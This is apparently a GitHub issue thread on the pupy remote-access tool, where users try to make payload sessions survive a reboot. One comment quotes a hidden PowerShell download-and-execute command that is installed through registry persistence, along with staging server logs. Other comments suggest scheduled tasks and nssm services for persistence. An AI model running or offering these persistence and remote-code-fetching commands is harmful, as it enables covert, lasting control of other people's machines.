### ISSUE TITLE
Hundred connections loading problems

### ISSUE THREAD

**Issue by W33v3ly** [n1nj4sec/pupy#549]
H

**Comment by killercoderz4** [comment]
How do you handle persistence. I implemented it as scriptlet but when I restart it doesn't work , my method is registry

**Comment by W33v3ly** [comment]
I use my own method task scheduler+batch

**Comment by killercoderz4** [comment]
ok , i have been trying to get at least some basic form of persistence but once i restart vm boom it gone. i used this scriptlet  run persistence -c "powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://<ipaddress>:443/index.html')\"" -m registry. at the ip address tag i put ip and bam it compiles and works but here is the challenge once i restart my vmare evrything disappears no session. i know i have alot to learn just had 3 days experience on pupy prject. can you please share any way i can get at least some basic persistence working , so i can evolve on it as i get deeper.Thanks alot as i await your feedback

**Comment by killercoderz4** [comment]
to make matters worse i nolonger get any session from my vm. i send  my bat file and run it
it get to here 
[+] Started http server on 0.0.0.0:443 
[+] waiting for a connection ...
197.210.47.191 - - [06/Jan/2018 09:35:35] "GET /index.html HTTP/1.1" 200 -
[+] [Stage 1/2] Powershell script served !
197.210.47.191 - - [06/Jan/2018 09:35:38] "GET /tata.html HTTP/1.1" 200 -
[+] remote script is running in a x64 powershell process
it stays there for almost an hour it meant to get to stage to and shell started but it doesnt. it was working flawlessly yesterday but everything is just bad today. i dint change anything same old configurations.it seems this tool still has lots of stability issues. any tip would be appreciated

**Comment by xuxuedong** [comment]
You can have a try nssm for windows platform

**Comment by killercoderz4** [comment]
@xuxuedong. Thanks for the tip, but this process require I setup nssm and install the payload service. But is there away to add it as a scriptket during payload build so I have unattended or automatic persistence which doesn't need me running commands after staging the payload in my VMware.thanks
